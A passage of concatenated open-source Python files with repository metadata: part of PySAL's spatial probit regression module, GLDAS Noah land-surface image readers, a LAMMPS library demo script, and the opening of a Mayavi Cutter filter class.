            self._cache['u_gen'] = u_gen
        return self._cache['u_gen']
    # the three spatial-error diagnostics are computed together by
    # sp_tests() (presumably a module-level helper defined elsewhere in
    # this file) and cached jointly
    @property
    def Pinkse_error(self):
        if 'Pinkse_error' not in self._cache:
            self._cache['Pinkse_error'], self._cache[
                'KP_error'], self._cache['PS_error'] = sp_tests(self)
        return self._cache['Pinkse_error']
    @property
    def KP_error(self):
        if 'KP_error' not in self._cache:
            self._cache['Pinkse_error'], self._cache[
                'KP_error'], self._cache['PS_error'] = sp_tests(self)
        return self._cache['KP_error']
    @property
    def PS_error(self):
        if 'PS_error' not in self._cache:
            self._cache['Pinkse_error'], self._cache[
                'KP_error'], self._cache['PS_error'] = sp_tests(self)
        return self._cache['PS_error']
    def par_est(self):
        # OLS coefficients serve as starting values for the optimizer
        start = np.dot(la.inv(np.dot(self.x.T, self.x)),
                       np.dot(self.x.T, self.y))
        flogl = lambda par: -self.ll(par)
        if self.optim == 'newton':
            # `newton` is presumably a module-level Newton-Raphson helper
            # defined elsewhere in this file
            fgrad = lambda par: self.gradient(par)
            fhess = lambda par: self.hessian(par)
            par_hat = newton(flogl, start, fgrad, fhess, self.maxiter)
            warn = par_hat[2]
        else:
            # scipy minimizers need the negative gradient of the
            # log-likelihood (they minimize -logL)
            fgrad = lambda par: -self.gradient(par)
            if self.optim == 'bfgs':
                par_hat = op.fmin_bfgs(
                    flogl, start, fgrad, full_output=1, disp=0)
                warn = par_hat[6]
            if self.optim == 'ncg':
                fhess = lambda par: -self.hessian(par)
                par_hat = op.fmin_ncg(
                    flogl, start, fgrad, fhess=fhess, full_output=1, disp=0)
                warn = par_hat[5]
        # normalize the optimizer's warnflag to a boolean
        if warn > 0:
            warn = True
        else:
            warn = False
        return par_hat, warn
    def ll(self, par):
        beta = np.reshape(np.array(par), (self.k, 1))
        # q maps y in {0, 1} to {-1, +1} so that P(y|x) = Phi(q * x * beta)
        q = 2 * self.y - 1
        qxb = q * np.dot(self.x, beta)
        ll = sum(np.log(norm.cdf(qxb)))
        return ll
    def gradient(self, par):
        beta = np.reshape(np.array(par), (self.k, 1))
        q = 2 * self.y - 1
        qxb = q * np.dot(self.x, beta)
        # lamb is the inverse Mills ratio term of the probit score
        lamb = q * norm.pdf(qxb) / norm.cdf(qxb)
        gradient = np.dot(lamb.T, self.x)[0]
        return gradient
    def hessian(self, par):
        beta = np.reshape(np.array(par), (self.k, 1))
        q = 2 * self.y - 1
        xb = np.dot(self.x, beta)
        qxb = q * xb
        lamb = q * norm.pdf(qxb) / norm.cdf(qxb)
        # analytic Hessian of the probit log-likelihood (negative definite)
        hessian = np.dot((self.x.T), (-lamb * (lamb + xb) * self.x))
        return hessian
class Probit(BaseProbit):
    """
    Classic non-spatial Probit and spatial diagnostics. The class includes a
    printout that formats all the results and tests in a nice format.

    The diagnostics for spatial dependence currently implemented are:

    * Pinkse Error [1]_
    * Kelejian and Prucha Moran's I [2]_
    * Pinkse & Slade Error [3]_

    Parameters
    ----------
    x : array
        nxk array of independent variables (assumed to be aligned with y)
    y : array
        nx1 array of dependent binary variable
    w : W
        PySAL weights instance aligned with y
    optim : string
        Optimization method.
        Default: 'newton' (Newton-Raphson).
        Alternatives: 'ncg' (Newton-CG), 'bfgs' (BFGS algorithm)
    scalem : string
        Method to calculate the scale of the marginal effects.
        Default: 'phimean' (Mean of individual marginal effects)
        Alternative: 'xmean' (Marginal effects at variables mean)
    maxiter : int
        Maximum number of iterations until optimizer stops
    name_y : string
        Name of dependent variable for use in output
    name_x : list of strings
        Names of independent variables for use in output
    name_w : string
        Name of weights matrix for use in output
    name_ds : string
        Name of dataset for use in output

    Attributes
    ----------
    x : array
        Two dimensional array with n rows and one column for each
        independent (exogenous) variable, including the constant
    y : array
        nx1 array of dependent variable
    betas : array
        kx1 array with estimated coefficients
    predy : array
        nx1 array of predicted y values
    n : int
        Number of observations
    k : int
        Number of variables
    vm : array
        Variance-covariance matrix (kxk)
    z_stat : list of tuples
        z statistic; each tuple contains the pair (statistic,
        p-value), where each is a float
    xmean : array
        Mean of the independent variables (kx1)
    predpc : float
        Percent of y correctly predicted
    logl : float
        Log-Likelihood of the estimation
    scalem : string
        Method to calculate the scale of the marginal effects.
    scale : float
        Scale of the marginal effects.
    slopes : array
        Marginal effects of the independent variables (k-1x1)
    slopes_vm : array
        Variance-covariance matrix of the slopes (k-1xk-1)
    LR : tuple
        Likelihood Ratio test of all coefficients = 0
        (test statistics, p-value)
    Pinkse_error: float
        Lagrange Multiplier test against spatial error correlation.
        Implemented as presented in Pinkse (2004)
    KP_error : float
        Moran's I type test against spatial error correlation.
        Implemented as presented in Kelejian and Prucha (2001)
    PS_error : float
        Lagrange Multiplier test against spatial error correlation.
        Implemented as presented in Pinkse and Slade (1998)
    warning : boolean
        if True Maximum number of iterations exceeded or gradient
        and/or function calls not changing.
    name_y : string
        Name of dependent variable for use in output
    name_x : list of strings
        Names of independent variables for use in output
    name_w : string
        Name of weights matrix for use in output
    name_ds : string
        Name of dataset for use in output
    title : string
        Name of the regression method used

    References
    ----------
    .. [1] Pinkse, J. (2004). Moran-flavored tests with nuisance parameter. In: Anselin, L., Florax, R. J., Rey, S. J. (editors) Advances in Spatial Econometrics, pages 67-77. Springer-Verlag, Heidelberg.
    .. [2] Kelejian, H., Prucha, I. (2001) "On the asymptotic distribution of the Moran I test statistic with applications". Journal of Econometrics, 104(2):219-57.
    .. [3] Pinkse, J., Slade, M. E. (1998) "Contracting in space: an application of spatial statistics to discrete-choice models". Journal of Econometrics, 85(1):125-54.

    Examples
    --------
    We first need to import the needed modules, namely numpy to convert the
    data we read into arrays that ``spreg`` understands and ``pysal`` to
    perform all the analysis.

    >>> import numpy as np
    >>> import pysal

    Open data on Columbus neighborhood crime (49 areas) using pysal.open().
    This is the DBF associated with the Columbus shapefile. Note that
    pysal.open() also reads data in CSV format; since the actual class
    requires data to be passed in as numpy arrays, the user can read their
    data in using any method.

    >>> dbf = pysal.open(pysal.examples.get_path('columbus.dbf'),'r')

    Extract the CRIME column (crime) from the DBF file and make it the
    dependent variable for the regression. Note that PySAL requires this to be
    an numpy array of shape (n, 1) as opposed to the also common shape of (n, )
    that other packages accept. Since we want to run a probit model and for this
    example we use the Columbus data, we also need to transform the continuous
    CRIME variable into a binary variable. As in McMillen, D. (1992) "Probit with
    spatial autocorrelation". Journal of Regional Science 32(3):335-48, we define
    y = 1 if CRIME > 40.

    >>> y = np.array([dbf.by_col('CRIME')]).T
    >>> y = (y>40).astype(float)

    Extract HOVAL (home values) and INC (income) vectors from the DBF to be used as
    independent variables in the regression. Note that PySAL requires this to
    be an nxj numpy array, where j is the number of independent variables (not
    including a constant). By default this class adds a vector of ones to the
    independent variables passed in.

    >>> names_to_extract = ['INC', 'HOVAL']
    >>> x = np.array([dbf.by_col(name) for name in names_to_extract]).T

    Since we want to test the probit model for spatial dependence, we need to
    specify the spatial weights matrix that includes the spatial configuration of
    the observations into the error component of the model. To do that, we can open
    an already existing gal file or create a new one. In this case, we will use
    ``columbus.gal``, which contains contiguity relationships between the
    observations in the Columbus dataset we are using throughout this example.
    Note that, in order to read the file, not only to open it, we need to
    append '.read()' at the end of the command.

    >>> w = pysal.open(pysal.examples.get_path("columbus.gal"), 'r').read()

    Unless there is a good reason not to do it, the weights have to be
    row-standardized so every row of the matrix sums to one. In PySAL, this
    can be easily performed in the following way:

    >>> w.transform='r'

    We are all set with the preliminaries, we are good to run the model. In this
    case, we will need the variables and the weights matrix. If we want to
    have the names of the variables printed in the output summary, we will
    have to pass them in as well, although this is optional.

    >>> model = Probit(y, x, w=w, name_y='crime', name_x=['income','home value'], name_ds='columbus', name_w='columbus.gal')

    Once we have run the model, we can explore a little bit the output. The
    regression object we have created has many attributes so take your time to
    discover them.

    >>> np.around(model.betas, decimals=6)
    array([[ 3.353811],
           [-0.199653],
           [-0.029514]])

    >>> np.around(model.vm, decimals=6)
    array([[ 0.852814, -0.043627, -0.008052],
           [-0.043627,  0.004114, -0.000193],
           [-0.008052, -0.000193,  0.00031 ]])

    Since we have provided a spatial weights matrix, the diagnostics for
    spatial dependence have also been computed. We can access them and their
    p-values individually:

    >>> tests = np.array([['Pinkse_error','KP_error','PS_error']])
    >>> stats = np.array([[model.Pinkse_error[0],model.KP_error[0],model.PS_error[0]]])
    >>> pvalue = np.array([[model.Pinkse_error[1],model.KP_error[1],model.PS_error[1]]])
    >>> print np.hstack((tests.T,np.around(np.hstack((stats.T,pvalue.T)),6)))
    [['Pinkse_error' '3.131719' '0.076783']
     ['KP_error' '1.721312' '0.085194']
     ['PS_error' '2.558166' '0.109726']]

    Or we can easily obtain a full summary of all the results nicely formatted and
    ready to be printed simply by typing 'print model.summary'
    """

    def __init__(
        self, y, x, w=None, optim='newton', scalem='phimean', maxiter=100,
        vm=False, name_y=None, name_x=None, name_w=None, name_ds=None,
            spat_diag=False):
        # Validate inputs before handing them to the base estimator.
        n = USER.check_arrays(y, x)
        USER.check_y(y, n)
        if w:
            USER.check_weights(w, y)
            # A weights matrix implies the user wants spatial diagnostics.
            spat_diag = True
        # Prepend the constant column.
        x_constant = USER.check_constant(x)
        BaseProbit.__init__(self, y=y, x=x_constant, w=w,
                            optim=optim, scalem=scalem, maxiter=maxiter)
        self.title = "CLASSIC PROBIT ESTIMATOR"
        self.name_ds = USER.set_name_ds(name_ds)
        self.name_y = USER.set_name_y(name_y)
        self.name_x = USER.set_name_x(name_x, x)
        self.name_w = USER.set_name_w(name_w, w)
        # Format the results/tests printout on the instance.
        SUMMARY.Probit(reg=self, w=w, vm=vm, spat_diag=spat_diag)
def newton(flogl, start, fgrad, fhess, maxiter):
    """Maximize a log-likelihood by Newton-Raphson iteration.

    Parameters
    ----------
    flogl : lambda
        Function to calculate the negative log-likelihood.
    start : array
        kx1 array of starting values.
    fgrad : lambda
        Function to calculate the gradient of the log-likelihood.
    fhess : lambda
        Function to calculate the hessian of the log-likelihood.
    maxiter : int
        Maximum number of iterations until optimizer stops.

    Returns
    -------
    tuple
        ``(estimates, flogl(estimates), warn)`` with ``warn`` set to 1
        when the iteration limit was reached.
    """
    params = start
    n_iter = 0
    crit = 1  # gradient-weighted step size; converged when < 1e-4
    while n_iter < maxiter and crit >= 1e-04:
        inv_neg_hess = -la.inv(fhess(params))
        score = fgrad(params).reshape(start.shape)
        step = np.dot(inv_neg_hess, score)
        params = params + step
        n_iter += 1
        crit = np.dot(score.T, step)
    warn = 1 if n_iter == maxiter else 0
    logl = flogl(params)
    return (params, logl, warn)
def sp_tests(reg):
    """Calculates tests for spatial dependence in Probit models.

    Parameters
    ----------
    reg : regression object
        output instance from a probit model; must carry a PySAL weights
        object in ``reg.w`` plus ``predy``, ``phiy``, ``u_naive``,
        ``u_gen`` and ``n``.

    Returns
    -------
    tuple
        (Pinkse LM error test, Kelejian-Prucha Moran's I,
        Pinkse-Slade error test), each a (statistic, p-value) array.

    Raises
    ------
    Exception
        If no weights matrix is attached to the regression object.
    """
    # Guard clause.  Note: the original used the Python-2-only statement
    # form ``raise Exception, "..."``; the call form below is equivalent
    # and valid on both Python 2 and 3.
    if not reg.w:
        raise Exception("W matrix not provided to calculate spatial test.")
    w = reg.w.sparse
    Phi = reg.predy
    phi = reg.phiy
    # Pinkse_error:
    Phi_prod = Phi * (1 - Phi)
    u_naive = reg.u_naive
    u_gen = reg.u_gen
    sig2 = np.sum((phi * phi) / Phi_prod) / reg.n
    LM_err_num = np.dot(u_gen.T, (w * u_gen)) ** 2
    trWW = np.sum((w * w).diagonal())
    trWWWWp = trWW + np.sum((w * w.T).diagonal())
    LM_err = float(1.0 * LM_err_num / (sig2 ** 2 * trWWWWp))
    LM_err = np.array([LM_err, chisqprob(LM_err, 1)])
    # KP_error:
    moran = moran_KP(reg.w, u_naive, Phi_prod)
    # Pinkse-Slade_error:
    u_std = u_naive / np.sqrt(Phi_prod)
    ps_num = np.dot(u_std.T, (w * u_std)) ** 2
    trWpW = np.sum((w.T * w).diagonal())
    ps = float(ps_num / (trWW + trWpW))
    # chi-square approximation used instead of bootstrap.
    ps = np.array([ps, chisqprob(ps, 1)])
    return LM_err, moran, ps
def moran_KP(w, u, sig2i):
    """Calculates Moran-flavoured tests.

    Parameters
    ----------
    w : W
        PySAL weights instance aligned with y.
    u : array
        nx1 array of naive residuals.
    sig2i : array
        nx1 array of individual variance.

    Returns
    -------
    array
        Two-element array ``[statistic, two-sided normal p-value]``.
    """
    sparse_w = w.sparse
    numerator = np.dot(u.T, (sparse_w * u))
    # Sparse diagonal matrix holding the individual variances.
    var_diag = SP.lil_matrix(sparse_w.get_shape())
    var_diag.setdiag(sig2i.flat)
    var_diag = var_diag.asformat('csr')
    weighted = sparse_w * var_diag
    denominator = np.sqrt(np.sum(
        (weighted * weighted + (sparse_w.T * var_diag) * weighted).diagonal()))
    stat = float(1.0 * numerator / denominator)
    return np.array([stat, norm.sf(abs(stat)) * 2.])
def _test():
    """Run this module's doctests with numpy float printing suppressed.

    The previous 'suppress' print option is restored afterwards so the
    call leaves the global numpy printing state untouched.
    """
    import doctest
    previous = np.get_printoptions()
    np.set_printoptions(suppress=True)
    doctest.testmod()
    np.set_printoptions(suppress=previous['suppress'])
if __name__ == '__main__':
    # Run the doctests first.
    _test()
    import numpy as np
    import pysal
    # Re-build the example from the class docstring on the Columbus data.
    dbf = pysal.open(pysal.examples.get_path('columbus.dbf'), 'r')
    y = np.array([dbf.by_col('CRIME')]).T
    var_x = ['INC', 'HOVAL']
    x = np.array([dbf.by_col(name) for name in var_x]).T
    # Row-standardized contiguity weights.
    w = pysal.open(pysal.examples.get_path("columbus.gal"), 'r').read()
    w.transform = 'r'
    # Binary dependent variable: CRIME > 40.
    probit1 = Probit(
        (y > 40).astype(float), x, w=w, name_x=var_x, name_y="CRIME",
        name_ds="Columbus", name_w="columbus.dbf")
    # print probit1.summary
| spreg-git/pysal | pysal/spreg/probit.py | Python | bsd-3-clause | 26,765 | [
"COLUMBUS"
] | 84bb201c23f9372d91133546df1791aac7722b66dd6fb7034efcad505c07cb5d |
# The MIT License (MIT)
#
# Copyright (c) 2018, TU Wien
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import warnings
import numpy as np
import os
try:
import pygrib
except ImportError:
warnings.warn("pygrib has not been imported")
from pygeobase.io_base import ImageBase, MultiTemporalImageBase
from pygeobase.object_base import Image
from pynetcf.time_series import GriddedNcOrthoMultiTs
from datetime import timedelta
from gldas.grid import GLDAS025Cellgrid
from netCDF4 import Dataset
from pygeogrids.netcdf import load_grid
class GLDAS_Noah_v21_025Img(ImageBase):
    """
    Class for reading one GLDAS Noah v2.1 nc file in 0.25 deg grid.

    Parameters
    ----------
    filename: string
        filename of the GLDAS nc file
    mode: string, optional
        mode of opening the file, only 'r' is implemented at the moment
    parameter : string or list, optional
        one or list of parameters to read, see GLDAS v2.1 documentation
        for more information (default: 'SoilMoi0_10cm_inst').
    subgrid : Cell Grid
        Subgrid of the global GLDAS Grid to use for reading image data
        (e.g only land points)
    array_1D: boolean, optional
        if set then the data is read into 1D arrays.
        Needed for some legacy code.
    """

    def __init__(self, filename, mode='r', parameter='SoilMoi0_10cm_inst',
                 subgrid=None, array_1D=False):
        super(GLDAS_Noah_v21_025Img, self).__init__(filename, mode=mode)

        if type(parameter) != list:
            parameter = [parameter]
        self.parameters = parameter
        # Padding for the 120 southernmost grid rows (1440 * 120 cells)
        # which are not contained in the data files.
        self.fill_values = np.repeat(9999., 1440 * 120)
        self.grid = GLDAS025Cellgrid() if not subgrid else subgrid
        self.array_1D = array_1D

    def read(self, timestamp=None):
        """Read one image (and metadata) for the requested parameters.

        Parameters
        ----------
        timestamp : datetime, optional
            Timestamp that is attached to the returned Image.

        Returns
        -------
        Image
            pygeobase Image with either 1D (``array_1D=True``) or
            (720, 1440) 2D data arrays.
        """
        return_img = {}
        return_metadata = {}

        try:
            dataset = Dataset(self.filename)
        except IOError as e:
            print(e)
            print(" ".join([self.filename, "can not be opened"]))
            raise e

        param_names = list(self.parameters)

        for parameter, variable in dataset.variables.items():
            if parameter in param_names:
                param_metadata = {}
                for attrname in variable.ncattrs():
                    if attrname in ['long_name', 'units']:
                        param_metadata.update(
                            {str(attrname): getattr(variable, attrname)})
                param_data = dataset.variables[parameter][:]
                np.ma.set_fill_value(param_data, 9999)
                # Prepend the southern padding so the flat array covers
                # the full global 0.25 deg grid.
                param_data = np.concatenate((
                    self.fill_values,
                    np.ma.getdata(param_data.filled()).flatten()))
                return_img.update(
                    {str(parameter): param_data[self.grid.activegpis]})
                return_metadata.update({str(parameter): param_metadata})

        dataset.close()

        # Check for corrupt files: every requested parameter must have
        # been found, otherwise substitute a NaN image.  This fixes three
        # bugs in the original implementation: only the last variable of
        # the file was checked (the check sat outside the parameter loop),
        # ``np.empty(...).fill(nan)`` stored None instead of the filled
        # array, and 'corrupt_parameters' was appended to without ever
        # being created.
        for parameter in self.parameters:
            if parameter not in return_img:
                path, thefile = os.path.split(self.filename)
                print('%s in %s is corrupt - filling '
                      'image with NaN values' % (parameter, thefile))
                nan_img = np.empty(self.grid.n_gpi)
                nan_img.fill(np.nan)
                return_img[parameter] = nan_img
                return_metadata.setdefault(
                    'corrupt_parameters', []).append(parameter)

        if self.array_1D:
            return Image(self.grid.activearrlon, self.grid.activearrlat,
                         return_img, return_metadata, timestamp)
        else:
            # Reshape to the global 2D grid, with north up.
            for key in return_img:
                return_img[key] = np.flipud(
                    return_img[key].reshape((720, 1440)))

            return Image(
                np.flipud(self.grid.activearrlon.reshape((720, 1440))),
                np.flipud(self.grid.activearrlat.reshape((720, 1440))),
                return_img,
                return_metadata,
                timestamp)

    def write(self, data):
        raise NotImplementedError()

    def flush(self):
        pass

    def close(self):
        pass
class GLDAS_Noah_v1_025Img(ImageBase):
    """
    Class for reading one GLDAS Noah v1 grib file in 0.25 deg grid.

    Parameters
    ----------
    filename: string
        filename of the GLDAS grib file
    mode: string, optional
        mode of opening the file, only 'r' is implemented at the moment
    parameter : string or list, optional
        one or list of ['001', '011', '032', '051', '057', '065', '071',
        '085_L1', '085_L2', '085_L3', '085_L4',
        '086_L1', '086_L2', '086_L3', '086_L4',
        '099', '111', '112', '121', '122',
        '131', '132', '138', '155',
        '204', '205', '234', '235']
        parameters to read, see GLDAS documentation for more information
        Default : '086_L1'
    subgrid : Cell Grid
        Subgrid of the global GLDAS Grid to use for reading image data
        (e.g only land points)
    array_1D: boolean, optional
        if set then the data is read into 1D arrays.
        Needed for some legacy code.
    """

    def __init__(self, filename, mode='r', parameter='086_L1', subgrid=None, array_1D=False):
        super(GLDAS_Noah_v1_025Img, self).__init__(filename, mode=mode)

        if type(parameter) != list:
            parameter = [parameter]
        self.parameters = parameter
        # Padding for the 120 southernmost grid rows (1440 * 120 cells)
        # that the data files do not cover.
        self.fill_values = np.repeat(9999., 1440 * 120)
        self.grid = subgrid if subgrid else GLDAS025Cellgrid()
        self.array_1D = array_1D

    def read(self, timestamp=None):
        """Read one grib image for the requested parameters.

        Grib messages do not carry a layer suffix, so for the layered
        parameter ids ('085', '086') a running counter in ``layers``
        assigns L1, L2, ... in the order the messages appear in the file.

        Parameters
        ----------
        timestamp : datetime, optional
            Timestamp attached to the returned Image.
        """
        return_img = {}
        return_metadata = {}

        # Next layer number to assign for the layered parameter ids.
        layers = {'085': 1, '086': 1}

        try:
            grbs = pygrib.open(self.filename)
        except IOError as e:
            print(e)
            print(" ".join([self.filename, "can not be opened"]))
            raise e

        # Numeric ids of all requested parameters (suffix stripped).
        ids = []
        for parameter in self.parameters:
            ids.append(int(parameter.split('_')[0]))
        parameter_ids = np.unique(np.array(ids))

        for message in grbs:
            if message['indicatorOfParameter'] in parameter_ids:
                parameter_id = '{:03d}'.format(message['indicatorOfParameter'])
                param_metadata = {}
                # read metadata in any case
                param_metadata['units'] = message['units']
                param_metadata['long_name'] = message['parameterName']

                if parameter_id in layers.keys():
                    # Layered parameter: attach the current layer suffix
                    # and advance the counter for every matching message,
                    # even if this particular layer was not requested.
                    parameter = '_'.join((parameter_id, 'L' +
                                          str(layers[parameter_id])))
                    if parameter in self.parameters:
                        param_data = np.concatenate((
                            self.fill_values,
                            np.ma.getdata(message['values']).flatten()))
                        return_img[parameter] = param_data[
                            self.grid.activegpis]
                        return_metadata[parameter] = param_metadata
                    layers[parameter_id] += 1
                else:
                    parameter = parameter_id
                    param_data = np.concatenate((
                        self.fill_values,
                        np.ma.getdata(message['values']).flatten()))
                    return_img[parameter] = param_data[self.grid.activegpis]
                    return_metadata[parameter] = param_metadata

        grbs.close()

        # Any requested parameter missing from the file marks a corrupt
        # file; substitute a NaN image for it.
        for parameter in self.parameters:
            try:
                return_img[parameter]
            except KeyError:
                print(self.filename[self.filename.rfind('GLDAS'):],
                      'corrupt file - filling image with nan values')
                return_img[parameter] = np.empty(self.grid.n_gpi)
                return_img[parameter].fill(np.nan)

        if self.array_1D:
            return Image(self.grid.activearrlon,
                         self.grid.activearrlat,
                         return_img,
                         return_metadata,
                         timestamp)
        else:
            # Reshape to the global 2D grid, with north up.
            for key in return_img:
                return_img[key] = np.flipud(
                    return_img[key].reshape((720, 1440)))
            lons = np.flipud(self.grid.activearrlon.reshape((720, 1440)))
            lats = np.flipud(self.grid.activearrlat.reshape((720, 1440)))
            return Image(lons, lats, return_img, return_metadata, timestamp)

    def write(self, data):
        raise NotImplementedError()

    def flush(self):
        pass

    def close(self):
        pass
class GLDAS_Noah_v21_025Ds(MultiTemporalImageBase):
    """
    Class for reading GLDAS v2.1 images in nc format.

    Parameters
    ----------
    data_path : string
        Path to the nc files
    parameter : string or list, optional
        one or list of parameters to read, see GLDAS v2.1 documentation
        for more information (default: 'SoilMoi0_10cm_inst').
    subgrid : Cell Grid
        Subgrid of the global GLDAS Grid to use for reading image data
        (e.g only land points)
    array_1D: boolean, optional
        If set then the data is read into 1D arrays.
        Needed for some legacy code.
    """

    def __init__(self, data_path, parameter='SoilMoi0_10cm_inst',
                 subgrid=None, array_1D=False):
        # Options forwarded to every GLDAS_Noah_v21_025Img instance.
        img_kwargs = {'parameter': parameter,
                      'subgrid': subgrid,
                      'array_1D': array_1D}
        super(GLDAS_Noah_v21_025Ds, self).__init__(
            data_path, GLDAS_Noah_v21_025Img,
            fname_templ="GLDAS_NOAH025_3H.A{datetime}.*.nc4",
            datetime_format="%Y%m%d.%H%M",
            subpath_templ=['%Y', '%j'],  # files sorted in year/doy folders
            exact_templ=False,
            ioclass_kws=img_kwargs)

    def tstamps_for_daterange(self, start_date, end_date):
        """
        return timestamps for daterange,

        Parameters
        ----------
        start_date: datetime
            start of date range
        end_date: datetime
            end of date range

        Returns
        -------
        timestamps : list
            list of datetime objects of each available image between
            start_date and end_date
        """
        # GLDAS images are produced every three hours, starting at 00:00.
        three_hourly = [timedelta(hours=h) for h in range(0, 24, 3)]
        timestamps = []
        for day in range((end_date - start_date).days + 1):
            midnight = start_date + timedelta(days=day)
            timestamps.extend(midnight + step for step in three_hourly)
        return timestamps
class GLDAS_Noah_v1_025Ds(MultiTemporalImageBase):
    """
    Class for reading GLDAS images in grib format.

    Parameters
    ----------
    data_path : string
        path to the grib files
    parameter : string or list, optional
        one or list of ['001', '011', '032', '051', '057', '065', '071',
        '085_L1', '085_L2', '085_L3', '085_L4',
        '086_L1', '086_L2', '086_L3', '086_L4',
        '099', '111', '112', '121', '122', '131', '132', '138',
        '155', '204', '205', '234', '235']
        parameters to read, see GLDAS documentation for more information
        Default : '086_L1'
    subgrid : Cell Grid
        Subgrid of the global GLDAS Grid to use for reading image data
        (e.g only land points)
    array_1D: boolean, optional
        if set then the data is read into 1D arrays.
        Needed for some legacy code.
    """

    def __init__(self, data_path, parameter='086_L1', subgrid=None,
                 array_1D=False):
        # Options forwarded to every GLDAS_Noah_v1_025Img instance.
        img_kwargs = {'parameter': parameter,
                      'subgrid': subgrid,
                      'array_1D': array_1D}
        super(GLDAS_Noah_v1_025Ds, self).__init__(
            data_path, GLDAS_Noah_v1_025Img,
            fname_templ="GLDAS_NOAH025SUBP_3H.A{datetime}.001.*.grb",
            datetime_format="%Y%j.%H%M",
            subpath_templ=['%Y', '%j'],  # files sorted in year/doy folders
            exact_templ=False,
            ioclass_kws=img_kwargs)

    def tstamps_for_daterange(self, start_date, end_date):
        """
        return timestamps for daterange,

        Parameters
        ----------
        start_date: datetime
            start of date range
        end_date: datetime
            end of date range

        Returns
        -------
        timestamps : list
            list of datetime objects of each available image between
            start_date and end_date
        """
        # GLDAS images are produced every three hours, starting at 00:00.
        three_hourly = [timedelta(hours=h) for h in range(0, 24, 3)]
        timestamps = []
        for day in range((end_date - start_date).days + 1):
            midnight = start_date + timedelta(days=day)
            timestamps.extend(midnight + step for step in three_hourly)
        return timestamps
class GLDASTs(GriddedNcOrthoMultiTs):

    def __init__(self, ts_path, grid_path=None, **kwargs):
        '''
        Class for reading GLDAS time series after reshuffling.

        Parameters
        ----------
        ts_path : str
            Directory where the netcdf time series files are stored
        grid_path : str, optional (default: None)
            Path to grid file, that is used to organize the location of
            time series to read. If None is passed, grid.nc is searched
            for in the ts_path.

        Optional keyword arguments that are passed to the Gridded Base:
        ------------------------------------------------------------------
        parameters : list, optional (default: None)
            Specific variable names to read; if None, all are read.
        offsets : dict, optional (default: None)
            Offsets (values) that are added to the parameters (keys)
        scale_factors : dict, optional (default: None)
            Offset (value) that the parameters (key) is multiplied with
        ioclass_kws: dict
            Optional keyword arguments passed to the OrthoMultiTs class:

            read_bulk : boolean, optional (default: False)
                If True the data of all locations is read into memory and
                subsequent calls to read_ts read from the cache and not
                from disk; this makes reading complete files faster.
            read_dates : boolean, optional (default: False)
                If False, dates are not read automatically but only on
                request; useful for bulk reading, because the netCDF
                num2date routine is very slow for big datasets.
        '''
        # Fall back to the grid definition stored next to the time series.
        grid_file = grid_path if grid_path is not None else os.path.join(
            ts_path, "grid.nc")
        cell_grid = load_grid(grid_file)
        super(GLDASTs, self).__init__(ts_path, cell_grid, **kwargs)
"NetCDF"
] | 19c6e282d87ce9b6cdd59b621f42196e8b3761e7b8bee98ae6dfa7049770316e |
#!/usr/bin/env python -i
# preceding line should have path for Python on your machine

# demo.py
# Purpose: illustrate use of many library interface commands
# Syntax:  demo.py
#          uses in.demo as LAMMPS input script

from __future__ import print_function
import sys

# parse command line: the demo takes no arguments
argv = sys.argv
if len(argv) != 1:
    print("Syntax: demo.py")
    sys.exit()

from lammps import lammps
lmp = lammps()

# test out various library functions after running in.demo
lmp.file("in.demo")
print("\nPython output:")

# direct access to internal per-simulation and per-atom data
natoms = lmp.extract_global("natoms",0)
mass = lmp.extract_atom("mass",2)
x = lmp.extract_atom("x",3)
print("Natoms, mass, x[0][0] coord =",natoms,mass[1],x[0][0])

# computes, variables and thermo values
temp = lmp.extract_compute("thermo_temp",0,0)
print("Temperature from compute =",temp)
eng = lmp.extract_variable("eng",None,0)
print("Energy from equal-style variable =",eng)
vy = lmp.extract_variable("vy","all",1)
print("Velocity component from atom-style variable =",vy[1])
vol = lmp.get_thermo("vol")
print("Volume from get_thermo = ",vol)
natoms = lmp.get_natoms()
print("Natoms from get_natoms =",natoms)

# gather/scatter copy per-atom data between LAMMPS and Python;
# the scatter writes the modified coordinate back into LAMMPS,
# which is visible through the live pointer `x`
xc = lmp.gather_atoms("x",1,3)
print("Global coords from gather_atoms =",xc[0],xc[1],xc[31])
xc[0] = xc[0] + 1.0
lmp.scatter_atoms("x",1,3,xc)
print("Changed x[0][0] via scatter_atoms =",x[0][0])
| Pakketeretet2/lammps | python/examples/demo.py | Python | gpl-2.0 | 1,302 | [
"LAMMPS"
] | feffb91a1dccc757f712af376a4bfe7aacded9e2fcbab355ab24f64c1a0f97b5 |
"""A simple wrapper for `tvtk.Cutter`.
"""
# Author: Prabhu Ramachandran <prabhu_r@users.sf.net>
# Copyright (c) 2005-2008, Enthought, Inc.
# License: BSD Style.
# Enthought library imports.
from traits.api import Instance, Property
from traitsui.api import View, Group, Item
from tvtk.api import tvtk
# Local imports.
from mayavi.core.component import Component
######################################################################
# `Cutter` class.
######################################################################
class Cutter(Component):
    """Simple wrapper component around ``tvtk.Cutter``.

    Exposes the underlying cutter's ``cut_function`` as a trait property
    and keeps the output pipeline in sync with the first input.
    """

    # The version of this class.  Used for persistence.
    __version__ = 0

    # The mapper.
    cutter = Instance(tvtk.Cutter, args=())

    # The cut function.  This should be a delegate but due to a bug in
    # traits that does not work.
    cut_function = Property

    ########################################
    # View related traits.
    view = View(Group(Item(name='cutter',
                           style='custom',
                           resizable=True),
                      show_labels=False),
                resizable=True)

    ######################################################################
    # `Component` interface
    ######################################################################
    def update_pipeline(self):
        """Rebuild the tvtk pipeline from the first input.

        Invoked (automatically) when the input fires a
        `pipeline_changed` event.
        """
